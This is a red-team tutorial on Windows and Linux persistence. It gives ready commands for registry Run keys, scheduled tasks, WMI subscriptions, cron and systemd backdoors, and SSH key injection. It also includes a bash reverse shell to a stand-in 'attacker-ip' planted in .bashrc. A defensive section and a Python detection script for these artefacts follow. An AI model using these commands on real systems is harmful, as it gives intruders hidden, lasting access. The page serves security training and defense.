Introduction to Persistence
In the context of offensive security and red teaming, persistence refers to techniques used by attackers to maintain long-term access to compromised systems. After initial exploitation, maintaining a foothold on the system ensures that the attacker can return later to continue data exfiltration, lateral movement, or control without needing to exploit the system again. Effective persistence is a critical phase of post-exploitation and is often customized to avoid detection by endpoint detection and response (EDR) solutions.
Objectives of Persistence
– Maintain continuous access to the target system.
– Evade detection from antivirus and monitoring tools.
– Enable re-entry without further exploitation.
– Set up covert communication channels.
– Support long-term operations like data exfiltration and reconnaissance.
Windows Persistence Techniques
Windows provides multiple methods to achieve persistence. Attackers often exploit legitimate features such as scheduled tasks and registry entries. Below are some of the most commonly used Windows persistence methods:
1. Registry Run Key:
Command:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "C:\malware.exe"
2. Scheduled Task:
Command:
schtasks /create /tn "Updater" /tr "C:\backdoor.exe" /sc onlogon /rl highest
3. Windows Management Instrumentation (WMI):
Command (PowerShell):
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{Name='LogonTrigger'; EventNamespace='root\cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LocalTime'"}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{Name='LogonConsumer'; CommandLineTemplate='C:\malware.exe'}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{Filter = $Filter; Consumer = $Consumer}
4. Startup Folder:
Command:
copy C:\backdoor.exe "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5. DLL Hijacking:
Technique:
Place a malicious DLL in a directory where a vulnerable application loads it instead of the legitimate one.
Linux Persistence Techniques
Linux systems also offer multiple avenues for attackers to establish persistence. Methods often include modifying user profile scripts or leveraging cron jobs.
1. Cron Jobs:
Command:
(crontab -l 2>/dev/null; echo "@reboot /home/user/backdoor.sh") | crontab -
2. .bashrc File:
Command:
echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> ~/.bashrc
3. Systemd Service:
Commands:
nano /etc/systemd/system/persistence.service
[Unit]
Description=Persistence Backdoor
[Service]
ExecStart=/bin/bash /root/backdoor.sh
[Install]
WantedBy=multi-user.target
Then:
systemctl daemon-reexec
systemctl enable persistence
systemctl start persistence
4. SSH Key Injection:
Command:
echo "<attacker-public-key>" >> ~/.ssh/authorized_keys
Cross-Platform Techniques
1. Reverse Shell via Startup Script:
– Linux: echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> ~/.bashrc
– Windows: Create a PowerShell reverse shell batch file in the Startup folder
2. Malicious Browser Extension:
Technique: Use a fake browser extension that exfiltrates data or opens a C2 channel. Often delivered via phishing.
3. Cloud Persistence:
Technique: Abuse OAuth tokens, API keys, or misconfigured access policies in cloud services (e.g., Google Workspace, Office 365).
Persistence via Tools
– Metasploit: use post/windows/manage/persistence
– Empire: Use ‘persistence’ module
– Nishang: PowerShell-based persistence scripts
– Evil-WinRM: Used to maintain shell access on Windows targets
– SharpPersist: Automates registry, WMI, and other methods
Detection and Defense
– Use Autoruns or other Sysinternals tools to detect abnormal startup items.
– Monitor for unauthorized crontab or systemd changes in Linux.
– Review WMI filters and consumers for unexpected entries.
– Scan startup folders and PowerShell histories.
– Audit cloud access logs and app permissions regularly.
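A host-side triage check for the Linux artefacts listed above (crontab, .bashrc, systemd units, authorized_keys), added here as an example and not taken from the original page. The snapshots it scans are constructed samples, and the approved-key allowlist is an assumption standing in for whatever inventory a real environment keeps:

```python
import configparser
import re

# Indicators drawn from the artefacts described above; IP and key blobs below are constructed samples.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|bash -i")
REBOOT_CRON_RE = re.compile(r"^\s*@reboot\s+")
UNTRUSTED_PATH_RE = re.compile(r"(^|\s)/(home|root|tmp|dev/shm)/")

def audit_crontab(crontab_text):
    """Return @reboot jobs: they survive reboots and are rare in legitimate user crontabs."""
    return [l.strip() for l in crontab_text.splitlines() if REBOOT_CRON_RE.match(l)]

def audit_shell_rc(rc_text):
    """Return rc-file lines that open a network connection (bash /dev/tcp, nc -e, interactive bash)."""
    return [l.strip() for l in rc_text.splitlines() if REVERSE_SHELL_RE.search(l)]

def audit_systemd_unit(unit_text):
    """Return the ExecStart value if it runs something out of a home, root or temp directory."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(unit_text)
    exec_start = cp.get("Service", "ExecStart", fallback="")
    return [exec_start] if UNTRUSTED_PATH_RE.search(exec_start) else []

def audit_authorized_keys(keys_text, approved_keys):
    """Return key lines that are not on the approved allowlist (exact match on the key line)."""
    return [l.strip() for l in keys_text.splitlines() if l.strip() and l.strip() not in approved_keys]

def audit_host(crontab, rc, unit, keys, approved_keys):
    """Run every check and return only the sources that produced findings."""
    findings = {"crontab": audit_crontab(crontab), "bashrc": audit_shell_rc(rc),
                "systemd": audit_systemd_unit(unit),
                "authorized_keys": audit_authorized_keys(keys, approved_keys)}
    return {k: v for k, v in findings.items() if v}

# Constructed sample snapshots that mirror the page's Linux examples (not captured from a real host).
SAMPLE_CRONTAB = "0 3 * * * /usr/bin/apt update\n@reboot /home/user/backdoor.sh\n"
SAMPLE_BASHRC = "alias ll='ls -la'\nbash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n"
SAMPLE_UNIT = ("[Unit]\nDescription=Persistence Backdoor\n[Service]\n"
               "ExecStart=/bin/bash /root/backdoor.sh\n[Install]\nWantedBy=multi-user.target\n")
SAMPLE_KEYS = "ssh-ed25519 AAAAC3EXAMPLE-ADMIN-KEY admin@bastion\nssh-rsa AAAAB3EXAMPLE-UNKNOWN-KEY\n"
APPROVED_KEYS = {"ssh-ed25519 AAAAC3EXAMPLE-ADMIN-KEY admin@bastion"}

if __name__ == "__main__":
    for source, hits in audit_host(SAMPLE_CRONTAB, SAMPLE_BASHRC, SAMPLE_UNIT, SAMPLE_KEYS, APPROVED_KEYS).items():
        for hit in hits:
            print(f"[{source}] {hit}")
```

On a live host the same functions can be fed the output of `crontab -l`, the contents of each user's rc files, every unit under /etc/systemd/system and each authorized_keys file; a clean host returns an empty dict.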
Conclusion
Persistence is a vital stage in red teaming and offensive security. Mastery of multiple techniques and their stealthy implementations ensures successful long-term access to targets. Always test persistence in a controlled lab and document the methods for blue teams to enhance defensive strategies.
Labs for Practice
– TryHackMe: ‘Windows Persistence’, ‘Linux PrivEsc’
– HackTheBox: ‘Registry’, ‘Cronos’, and others
– Local VirtualBox or VMWare lab environments